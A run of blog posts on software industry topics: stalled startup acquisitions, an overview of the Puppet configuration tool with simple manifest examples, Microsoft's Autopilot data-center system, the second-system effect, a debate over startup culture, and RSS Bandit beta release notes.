Well, what about FeedBurner? Clearly Google has done a good job with that acquisition. Well I am not sure. I don't see any integration between Adwords and FeedBurner yet. I can't buy FeedBurner inventory through Google's text ad interface. I honestly don't see any additional money flowing to me, the publisher of the feed, since the Google acquisition. There's no way to know what the rate of signup by publishers has been since the acquisition, but I wonder if it's increased much.

And TACODA? I know that TACODA had an incredible fourth quarter post the acquisition by AOL, blowing way past the numbers we were projecting in our annual budget. But in the first quarter, AOL fired Curt Viebranz, TACODA's CEO, and many of the top members of the TACODA team are now gone from AOL. Another acquisition messed up.

But who am I to complain? We got paid right? So sit down and shut up.

From Joshua Schachter's comment on "How Yahoo dropped the del.icio.us ball with a pointless 3 year rewrite (from mod_perl to PHP)"

The writer is accidentally correct - we were told that it had to be in PHP to get ops support. Curiously the PHP part didn't take that much time - the majority of the "business logic" is in C++ which took forever and ever to write. I think the open question now is whether the remaining team will be able to innovate or be stuck in complicated codebase hell. 

From Dennis Howlett's article Google Sites - spoiled by usability issues

After 16 months at Google developer’s hands, the outcome is substandard. This is such a pity. In its JotSpot incarnation, it was far from perfect but that didn’t matter because JotSpot was shedding light on a new way of collaborating. Since passing into Google’s hands, the guts have been ripped out and then re-assembled with as much Google ’stuff’ as they could cram in but rushed to completion.

At the very least, Google should get rid of the gadgets addition facility and rework it. Otherwise, I sense the SMBs at which it is aimed will find the service a turn off.

Google has a real chance to differentiate itself from Microsoft - which is clearly what it wants to do, while adding significant numbers of users to its Google Apps offering. It won’t do it this way because despite all the gripes around Microsoft products, the fact is Microsoft offers a more polished experience. Until Google truly understands this, it will find it difficult to adequately compete. In the meantime, offerings like Wetpaint and Ning have little to fear.

From Ryan Paul's article Jaiku users flee to Twitter as a result of Google's neglect

Unfortunately, Google has allowed Jaiku to languish and is now suffering a backlash from frustrated users who are beginning to mass-migrate to Twitter, a competing microblogging service. Jaiku's external feed servers, which are used by third-party Jaiku client applications, have been down frequently during the past week, often returning 504 gateway errors or nothing at all. During the brief stints when the feed servers are operational, they have been extremely slow and often out of sync with the actual content—typically lagging by between four and 13 hours. These problems have been noted by many users and several third-party Jaiku client application developers who discussed the problem with Ars. Users also complain that Jaiku's IM bots and the third-party Jaiku Facebook interface are exhibiting problems as well.

When Google announced the acquisition, the company promised new features within a few months, but we have seen no evidence of any development at all. Registration is still closed and new users can only join the site by receiving an invitation from Google. The Jaiku developers have been completely and totally silent since the announcement of the takeover, and the official Jaiku blog—which used to have several messages a month—has had no new posts at all. The Jaiku Team feed has also not received any posts from Jaiku developers since the acquisition.

The stories are the same except that some of the names are different. A startup gets bought and immediately stops innovating because all their development time is being spent porting the code to a new platform. During that time newer, more agile competitors show up and eat their lunch. Why I find this to be such a conundrum is that when you buy a technology startup, you are primarily buying three things

  • customers
  • employees
  • technology

However the standard operating procedure during Web software acquisitions is to discard the technology and consequentially tick off the employees who made the product a success in the first place thus creating an exodus. The application rewrite plus employee exodus leads to product stagnation which eventually leads to lots of pissed off customers. Thus the entire value from the acquisition is effectively thrown away.

This is the default situation when it comes to acquisitions in the software industry. For every successful acquisition like Google + YouTube there are two or three that are more like Google + Dodgeball. So if there is a startup whose product you love that you hear is being acquired by a one of the large Web companies, be happy for the founders and be sad for yourself because the product you love is likely going to become a neglected bride.

Disclaimer: I'm an employee of a large software company that has displayed similarly counterproductive tactics when acquiring startups. Although no examples are provided in the post above, I'm sure some can be found from it's history of acquisitions.

Now Playing: Dire Straits - Money For Nothing


 

Puppet provides a mechanism for managing a heterogeneous cluster of Unix-like machines using a central configuration system and a declarative scripting language for describing machine configuration. The declarative scripting language abstracts away the many differences in various Unix-like operating systems.

Puppet is used for server management by a number of startups including PowerSet, Joost and Slide.

Typical Puppet Architecture

In a system managed using Puppet, Pupper Master is the central system-wide authority for configuration and coordination. Manifests are propagated to the Puppet Master from a source external to the system. Each server in the system periodically polls the Puppet Master to determine if their configuration is up to date. If this is not the case, then the new configuration is retrieved and the changes described by the new manifest are applied. The Puppet instance running on each client can be considered to be made up of the following layers

 

Each manifest is described in the Puppet Configuration Language which is a high level language for describing resources on a server and what actions to take on them. Retrieving the newest manifests and applying the changes they describe (if any) is provided by the Transactional Layer of Puppet. The Puppet Configuration Language is actually an abstraction that hides the differences in various Unix-like operating systems. This abstraction layer maps the various higher level resources in a manifest to the actual commands and file locations on the target operating systems of the server.

What Does Puppet Do?

The Puppet Master is the set of one or more servers that run the puppetmasterd daemon. This daemon listens for polling requests from the servers being managed by Puppet and returns the current configuration for the server to the machine. Each server to be managed by Puppet, must have the Puppet client installed and must run the puppetd daemon which polls the Puppet Master for configuration information.

Each manifest can be thought of as a declarative script which contains one or more commands (called resources in Puppet parlance) and their parameters, dependencies along with the prerequisites to running each command. Collections of resources can be grouped together as classes (complete with inheritance) which can be further grouped together as modules. See below for examples

Language Construct Example Description
Resource
service { "apache": require => Package["httpd"] }
The apache resource requires that the httpd package is installed
Class
class apache {
    service { "apache": require => Package["httpd"] }
file { "/nfs/configs/apache/server1.conf":
        group  => "www-data
     }

}
Groups together the rule that the apache service requires the httpd package to be installed and that the server1.conf apache configuration file should be owned by the www-data group.
Derived Class
class apache-ssl inherits apache {
    Service[apache] { require +> File["apache.pem"] }
}
The apache-ssl class defines all of the above and that additionally, the apache service also requires the existence of the apache.pem configuration file.
Module
class webserver::apache-ssl inherits apache {
    Service[apache] { require +> File["apache.pem"] }
}
The apache-ssl class is part of the webserver module.
Node
node "webserver.example.com" {
include webserver
}
Declares that the manifest for the machine named webserver.example.com is the webserver module.

A node describes the configuration for a particular machine given its name. Node names and their accompanying configuration can be defined directly in manifests as shown above. Another option is to either use external node classifiers which provide a dynamic mechanism for determine a machine's type based on it's name or use an LDAP directory for storing information about nodes in the cluster.

FURTHER READING

  • Puppet Type Reference – List of built in resource types abstracted by the Puppet configuration language.
  • Puppet Language Tutorial -  Introduction to the various language constructs in the puppet language including classes, modules, conditionals, variables, arrays and functions.

Now Playing: Linkin Park - Cure For The Itch


 

Categories: Web Development

Whenever you read stories about how Web companies like Facebook have 10,000 servers including 1800 database servers or that Google has one million servers, do you ever wonder how the system administrators that manage these services deal with deployment, patching, failure detection and system repair without going crazy? This post is the first in a series of posts that examines some of the technologies that successful Web companies use to manage large Web server farms.

Last year, Michael Isard of Microsoft Research wrote a paper entitled Autopilot: Automatic Data Center Management which describes the technology that Windows Live and Live Search services have used to manage their server farms. The abstract of his paper is as follows

Microsoft is rapidly increasing the number of large-scale web services that it operates. Services such as Windows Live Search and Windows Live Mail operate from data centers that contain tens or hundreds of thousands of computers, and it is essential that these data centers function reliably with minimal human intervention. This paper describes the first version of Autopilot, the automatic data center management infrastructure developed within Microsoft over the last few years. Autopilot is responsible for automating software provisioning and deployment; system monitoring; and carrying out repair actions to deal with faulty software and hardware. A key assumption underlying Autopilot is that the services built on it must be designed to be manageable. We also therefore outline the best practices adopted by applications that run on Autopilot.

The paper provides a high level overview of the system, it's design principles and the requirements for applications/services that can be managed by the system. It gives a lot of insight into what it takes to manage a large server farm while keeping management and personnel costs low.

The purpose of AutoPilot is to automate and simplify the basic tasks that system administrators typically perform in a data center. This includes installation and deployment of software (including operating systems and patches), monitoring the health of the system, taking basic repair actions and marking systems as needing physical repair or replacement.

However applications that will be managed by AutoPilot also have their responsibilities. The primary responsibility of these applications include being extremely fault tolerant (i.e. applications must be able to handle processes being killed without warning) and being capable of running in the case of large outages in the cloud (i.e. up to 50% of the servers being out of service). In addition, these applications need to be easy to install and configure which means that they need to be xcopy deployable. Finally, the application developers are responsible for describing which application specific error detection heuristics AutoPilot should use when monitoring their service.

Typical AutoPilot Architecture

 

The above drawing is taken from the research paper. According to the paper the tasks of the various components is as follows

The Device Manager is the central system-wide authority for configuration and coordination. The Provisioning Service and Deployment Service ensure that each computer is running the correct operating system image and set of application processes. The Watchdog Service and Repair Service cooperate with the application and the Device Manager to detect and recover from software and hardware failures. The Collection Service and Cockpit passively gather information about the running components and make it available in real-time for monitoring the health of the service, as well as recording statistics for off-line analysis. (These monitoring components are ―Autopiloted like any other application, and therefore communicate with the Device Manager and Watchdog Service which provide fault recovery, deployment assistance, etc., but this communication is not shown in the figure for simplicity.)

The typical functioning of the system is described in the following section.

What Does AutoPilot Do?

The set of machine types used by the application (e.g. Web crawler, front end Web server, etc) needs to be defined in a database stored by on the Device Manager. A server's machine type dictates what configuration files and application binaries need to be installed on the server. This list is manually defined by the system administrators for the application. The Device Manager also keeps track of the current state of the cluster including what various machine types are online and their health status.

The Provisioning Service continually scans the network looking for new servers that have come online. When a new member of the server cluster is detected, the Provisioning Service asks the Device Manager what operating system image it should be running and then images the machine with a new operating system before performing burn-in tests. If the tests are successful, the Provisioning Service informs the Device Manager that the server is healthy. In addition to operating system components, some AutoPilot specific services are also installed on the new server. There is a dedicated filesync service that ensures that the correct files are present on the computer and an application manager that ensures that the expected application binaries are running.

Both services determine what the right state of the machine should be by querying the Device Manager. If it is determined that the required application binaries and files are not present on the machine then they are retrieved from the Deployment Service. The Deployment Service is a host to the various application manifests which map to the various application folders, binaries and data files. These manifests are populated from the application's build system which is outside the AutoPilot system.

The Deployment Service also comes into play when a new version of the application is ready to be deployed. During this process a new manifest is loaded into the Deployment Service and the Device Manager informs the various machine types of the availability of the new application bits. Each machine type has a notion of an active manifest which allows application bits for a new version of the application to be deployed as an inactive manifest while the old version of the application is considered to be "active". The new version of the application is rolled out in chunks called "scale units". A scale unit is a group of multiple machine types which can number up to 500 machines. Partitioning the cluster into scale units allows code roll outs to be staged. For example, if you have a cluster of 10,000 machines with scale units of 500 machines, then AutoPilot could be configured keep roll outs to under 5 scale units at a time so that never more than 25% of the cloud is being upgraded at a time.

Besides operating system installation and deployment of application components, AutoPilot is also capable of monitoring the health of the service and taking certain repair actions. The Watchdog Service is responsible for detecting failures in the system. It does so by probing each of the servers in the cluster and testing various properties of the machines and the application(s) running on them based on various predetermined criteria. Each watchdog can report one of three results for a test; OK, Warning or Error. A Warning does not initiate any repair action and simply indicates a non-fatal error has occurred. When a watchdog reports an error back to the Device Manager, the machine is placed in the Failure state and one of the following repair actions is taken; DoNothing, Reboot, ReImage or Replace. The choice of repair action depends on the failure history of the machine. If this is the first error that has been reported on the machine in multiple days or weeks then it is assumed to be a transient error and the appropriate action is DoNothing. If not, the machine is rebooted and if after numerous reboots the system is still detected to be in error by the watchdogs it is re-imaged (a process which includes reformatting the hard drive and reinstalling the operating system as well redeploying application bits). If none of these solve the problem then the machine is marked for replacement and it is picked up by a data center technician during weekly or biweekly sweeps to remove dead servers.

System administrators can also directly monitor the system using data aggregated by the Collection Service which collects information from various performance counters is written to a large-scale distributed file store for offline data mining and to a SQL database where the data can be visualized as graphs and reports in a visualization tool known as the Cockpit

Now Playing: Nirvana - Jesus Doesn't Want Me For A Sunbeam


 

One of the valuable ideas from Frederick Brooks' classic The Mythical Man Month is the notion of the second system effect when designing software systems. The following is an excerpt from the book where the concept is introduced

An architect’s first work is apt to be spare and clean. He knows he doesn’t know what he’s doing, so he does it carefully and with great restraint.

As he designs the first work, frill after frill and embellishment after embellishment occur to him. These get stored away to be used “next time.” Sooner or later the first system is finished, and the architect, with firm confidence and a demonstrated mastery of that class of systems, is ready to build a second system.

This second is the most dangerous system a man ever designs. When he does his third and later ones, his prior experiences will confirm each other as to the general characteristics of such systems, and their differences will identify those parts of his experience that are particular and not generalizable.

The general tendency is to over-design the second system, using all the ideas and frills that were cautiously sidetracked on the first one.

In my experience, the second system effect doesn't just come into play when the creator(s) of the second system also worked on the first system. In many cases, a development team may be brought in to build a new version of a first system either because they are competitors trying to one up a successful product or they are building the next generation of the technology while the original team goes into "maintenance mode" (i.e. shades of The Soul of a New Machine). In such situations, the builders of the second system can fall into the trap that Frederick Brooks describes in chapter 5 of Mythical Man Month.

At almost any point in time over the past few years, I could easily count about three or four software projects I was personally familiar with that were making classic "second system" mistakes. However instead of vilifying these projects, I thought it would be useful to list the top three things I've seen that have separated second systems that have avoided falling into this trap and those that haven't.

Realize You Can't Do It All In One Release

A lot of projects lose their way because they try do a too much in a single release. As Raymond Chen wrote You don't know what you do until you know what you don't do. Until you start focusing on a key set of scenarios your product will nail and start cutting features that aren't necessary to hitting those scenarios, your project isn't ready for prime time. What developers often fail to remember is that there is always another version and you can fit those scenarios in at that point.

One company that gets this idea very well is Apple. I can still remember Cmdr Taco's infamous review of the original iPod when it ran in 2001; "No wireless. Less space than a nomad. Lame." However the iPod nailed its key scenarios and with that success kept expanding its set of key scenarios (more space, video, photos, etc) until it became the cultural juggernaut it is today. You can see the same qualities in the iPhone. Just a few months ago, you'd read articles like Final report: The iPhone is not open for business that argued against the iPhone because it didn't support 3G, lacked Exchange support and had a non-existent developer platform. However the original iPhone was still successful and they addressed these issues in the next version to even greater success.

You Can be Date Driven or Feature Driven but not Both

A date driven release is one where everyone on the team is working to hit a particular time cut off after which the product will ship with or without their feature. Software products that have to hit the back to school cycle, tax time or the holiday shopping cycle are often date driven. A feature driven software release takes the "we won't ship it until it is ready approach" which is popular among Open Source projects and at companies like Google (according to Steve Yegge).

The thing to note about both approaches is that they are built on compromise. In that, we will compromise on our ship date but not on our features or vice versa. Where software projects tend to go awry is when they decide to be both feature driven and date driven because it means they have left no room to compromise.  This is additionally problematic because we are so poor at project estimation in our industry. So at the start of a project you have features that should take a two years to ship only budgeted as needing a year of work. In a date driven release, once this discrepancy is realized it is at that point features start getting cut or "placed below the cut line". In a feature driven release, the ship date is adjusted and ship expectations adjusted.

Projects that are both feature driven and date driven (i.e. we have to ship features X, Y & Z on date A) end up delaying these decisions until the last minute since they aren't mentally setup to compromise on either the date or the features. So they end up doing neither until the very last minute. This leads to missed deadlines, hastily cut features and demoralization within the product team. This often continues for multiple deadlines until finally the project team gets to the point where they feel they must show something for all the missed deadlines and cut features by throwing together a mediocre release after the one too many missed deadlines. We've all seen software projects that have succumbed to this and it is a sad sight to behold.

Don't Lose Track of What Made the First System Successful

Developers tend to be a fairly critical lot so when they look at a successful "first system", they often only see the flaws. This is often what fuels the second system effect and leads to losing sight of why the first system became a hit in the first place. A recent example of this is the search engine Cuil which was started by some former employees of Google with the intent of building a search engine which fixes the issues with Google's search engine. Unfortunately, they had a disastrous product launch which has been documented in blog posts like How To Lose Your Cuil 20 Seconds After Launch and news articles such as Cuil shows us how not to launch a search engine.

When you look back at the PR buildup leading to Cuil's launch, it is interesting to note that even though the Cuil team dubbed themselves Google slayers they did not address the key things people like about Google's search. Google's search provides relevant search results as quickly as possible. Cuil bragged about providing more complete results because their search index was bigger, showing more results above the fold by going with three columns in their search engine results page and that it offered richer query refinement features than Google. Although all of these are weaknesses in Google's user experience they are trumped by the fact that Google provides extremely relevant search results.  The Cuil team lost sight of this, probably because working at Google they only ever talked about fixing the flaws in the search product instead of also internalizing what has made it so successful.

This is an extremely common mistake that cuts across all categories of software products.

Now Playing: Young Jeezy - Motivation


 

Categories: Programming

Earlier today I read two posts that were practically mirror opposites of each other. The first was Paul Graham's essay, The Pooled-Risk Company Management Company, where he makes a case against founding a company that you intend to run as a successful business over the long term and instead building a company you that you can sell to a public company so you can move on and enjoy your money. His argument is excerpted below

At this year's startup school, David Heinemeier Hansson gave a talk in which he suggested that startup founders should do things the old fashioned way. Instead of hoping to get rich by building a valuable company and then selling stock in a "liquidity event," founders should start companies that make money and live off the revenues. Sounds like a good plan. Let's think about the optimal way to do this.

One disadvantage of living off the revenues of your company is that you have to keep running it. And as anyone who runs their own business can tell you, that requires your complete attention. You can't just start a business and check out once things are going well, or they stop going well surprisingly fast.

The main economic motives of startup founders seem to be freedom and security. They want enough money that (a) they don't have to worry about running out of money and (b) they can spend their time how they want. Running your own business offers neither. You certainly don't have freedom: no boss is so demanding. Nor do you have security, because if you stop paying attention to the company, its revenues go away, and with them your income.

The best case, for most people, would be if you could hire someone to manage the company for you once you'd grown it to a certain size.
...
If such pooled-risk company management companies existed, signing up with one would seem the ideal plan for most people following the route David advocated. Good news: they do exist. What I've just described is an acquisition by a public company.

Austin Wiltshire has a counterpoint to Paul Graham's article entitled New hire cannon fodder where he decries the practice of "exploiting" junior developers so that a couple of fat cats with money can get even richer. Parts of Austin's counter argument are excerpted below

Why these large firms, and now even places like YCombinator continually think the best way to move forward in software is to hire as many gullible young naive programmers as possible and work them to death is beyond me.  It’s pretty well known that 80 hour work weeks and inexperience is a guarantee to continually make the same damn mistakes over and over again.  It’s also an open question as to why new hires let these companies take advantage of them so badly.  Paul Graham had a start up, he begged for angel investing, and his life should show you - what does he do now?  Well he learned from his experience that designing and building is for chumps, to make the big bucks and sit on your ass you become an angel investor.

Kids will work for pennies.  You can continue to fill their heads with dreams of having the next big idea, even though they are carrying all the risk for you.  Junior developers, whether entrepreneurs or otherwise, are being asked to give up their 20’s, probably the best, most energetic years of their lives, to have a chance at making a dent in someone else’s bottom line.  (Make note, the one exception here I’ve seen is 37 Signals :) )

But have we never stopped to think who truly is benefiting from all these hours?  Do we get paid more?  No.  In fact, because many of us are salaried, we’re effectively paid less.  Are we compensated with faster promotions?  Possibly - but don’t forget about that silicon ceiling.  The only person who knows how many hours you’re putting in is probably just the guy above you - but he makes sure to show just how productive his department is (via your hard work) to everyone.  He will always get the spoils.  Who will end up really getting the spoils out of any of YCombinator’s work?  Paul Graham.

Both arguments have their merits and there are also parts I disagree with on both sides. Austin is right that YCombinator takes advantage of the naivety of youth. However when you are in your 20s with no serious attachments (like a mortgage, a family or even a sick relative) it doesn't sound like a bad idea to make hay while the sun shines. If you can sacrifice some time in your youth for a chance at a better life for yourself and your future spouse/kids/girlfriend/family/etc in a few years, is it wrong to treat that as an opportunity? Especially if you'll be working in an energetic environment surrounded by likeminded souls all believing that you are building cool stuff? Additionally, if the startup doesn't work out [which it most likely won't] the experience will still turn out to be useful when you decide to get a regular job at some BigCo even if it is just realizing how good you have it to no longer have to work 80 hour weeks while eating Top Ramen for breakfast and dinner any more.

From that perspective I don't think Austin is right to completely rail against the startup lifestyle. However I totally agree with the general theme of Austin's post that working ridiculous hours is dumb. It should be common knowledge that sleep deprivation impairs brain function and may even lead to psychiatric disorders. The code you check-in during your 14th hour at your desk will not be as good as what you checked in during your 4th. If you really have to work that much, work on the weekends instead of spending over 12 hours sitting in front of your IDE. Even then, busting your butt to that extent only makes sense if you not only get to share the risks of failure but also the rewards of success as well. This means you better be a co-founder or someone with equity and not just some poor sap on salary.

My issue with Paul Graham's essay and the investment style of YCombinator is that I it sells startup founders short. Paul recently wrote an essay entitled Cities and Ambition where he had this beautiful quote about the kind of "peer pressure" the Silicon Valley area exerts on startup founders

When you ask what message a city sends, you sometimes get surprising answers. As much as they respect brains in Silicon Valley, the message the Valley sends is: you should be more powerful.

That's not quite the same message New York sends. Power matters in New York too of course, but New York is pretty impressed by a billion dollars even if you merely inherited it. In Silicon Valley no one would care except a few real estate agents. What matters in Silicon Valley is how much effect you have on the world. The reason people there care about Larry and Sergey is not their wealth but the fact that they control Google, which affects practically everyone.

Read the above quote again and let its message sink in. The great thing about software is how you can literally take nothing (i.e. a blank computer screen) and build something that changes the world. Bill and Paul did it with Microsoft. Larry and Sergey have done it with Google. Jerry and David did it with Yahoo!, and some might say Mark Zuckerberg is doing it with Facebook.

Are any of those companies YCombinator-style, built-to-flip companies? Nope.

I strongly believe in the idea behind the mantra "Change the World or Go Home". Unlike anything that has come before it, the combination of software and the World Wide Web has the potential to connect people and empower them in more ways than humanity has never seen. And it is possible to become immensely rich while moving humanity forward with the software that you create.

So if you have decided to found a startup, why decide to spend your youth building some "me too" application that conforms to all the current "Web 2.0" fads in the desperate hope that you can convince some BigCo to buy you out? That sounds like such a waste. Change the world or go home.

Now Playing: Wu-Tang Clan - Triumph


 

It's been just over a month since we released the alpha of the next release of RSS Bandit codenamed Phoenix. Below are a couple of posts about the alpha from some popular blogs

The tone of the feedback was generally the same. People were very interested in the synchronization with Google Reader but were dissatisfied due to bugs or performance issues. I hadn't expected so much interest in an alpha release otherwise we would have been more diligent about bug fixing and performance improvements. Anyway, there was a ton of great feedback and we fixed a bunch of bugs including the following issues

  • Application hangs on shutdown due to search indexing [bug 1967898]
  • Feeds in tree view not sorted in alphabetical order [bug 1999533]
  • Mouse wheel doesn't work when attempting to scroll feed list [bug 1999534]
  • Removing a synchronized feed source deletes all items across all feed sources [bug 1999800
  • Exception when loading feed list from NewsGator Online [bug 2000390]
  • Feed logos are broken image links in feeds synchronized from NewsGator Online [bug 2000764]
  • Context menu for a feed source doesn't contain the option to remove the feed source [bug 2000808]
  • Exception when loading feed list from Google Reader [bug 20001419]
  • Space not accepted in Name field of Synchronize Feeds dialog [bug 20001908]
  • Google Reader synchronizes feeds but not items within feeds [bug 2001911]
  • Favorite icon not downloaded for Google Reader feeds [bug 2001915]
  • Selecting Unread Items search folder displays error message [bug 2001916]
  • Incorrect NewsGator or Google Reader password cannot be changed [2002144]
  • Crash on attempting to download an enclosure [bug 2004646]
  • Google Reader password communicated over the wire in plain text [bug 2005154]
  • Option to take over network settings from Internet Explorer does not allow specifying proxy server password [bug 2005687]
  • Unable to play a downloaded video from the Download Manager [bug 2005854]
  • Media keeps playing after closing a browser tab [bug 2014408]
  • Custom column layouts not remembered for specific feeds [bug 2022242]
  • Category dropdown in Add Subscription Wizard doesn't match selected feed source [bug 2026658]

There were also a couple of performance and memory usage improvements that were made along the way. I still have one or two issues that I've been having problems reproducing such as one situation where we end up getting a streak of timeouts while waiting for HTTP responses from Google Reader. I suspect it has to do with making lots of requests to a single domain in rapid succession if you're behind a proxy server but I might be wrong. Despite that one issue, the application is now a lot more usable and is feature complete for the release. If you hit that issue, you can either wait a couple of minutes before retrying to refresh feeds or restart the application to clear it up.

You can download the beta version of Phoenix from RssBandit.Phoenix.Beta.Installer.zip. There are two files in the installer package, I suggest running setup.exe because that validates that you have the correct prerequisites to run the application and tells you where to get them otherwise.

If you have any problems feel free to file a bug on SourceForge or ask a question on our forum. Thanks for using our software.

PS: As RSS Bandit is a hobbyist application worked on in our free time, we rely on the generosity of our users when it comes to providing translations of our application. If you look at the supported language matrix for RSS Bandit, you'll see the languages in which the application has been translated in previous versions. We would love to get translators for those languages again and for any new languages as well.  If you'd like to provide your skills as a translator to the next release of RSS Bandit and believe you can get this done in this next month or two then please send mail to . We'd appreciate your help.

Now Playing: Lil Wayne - Best Rapper Alive


 

Categories: RSS Bandit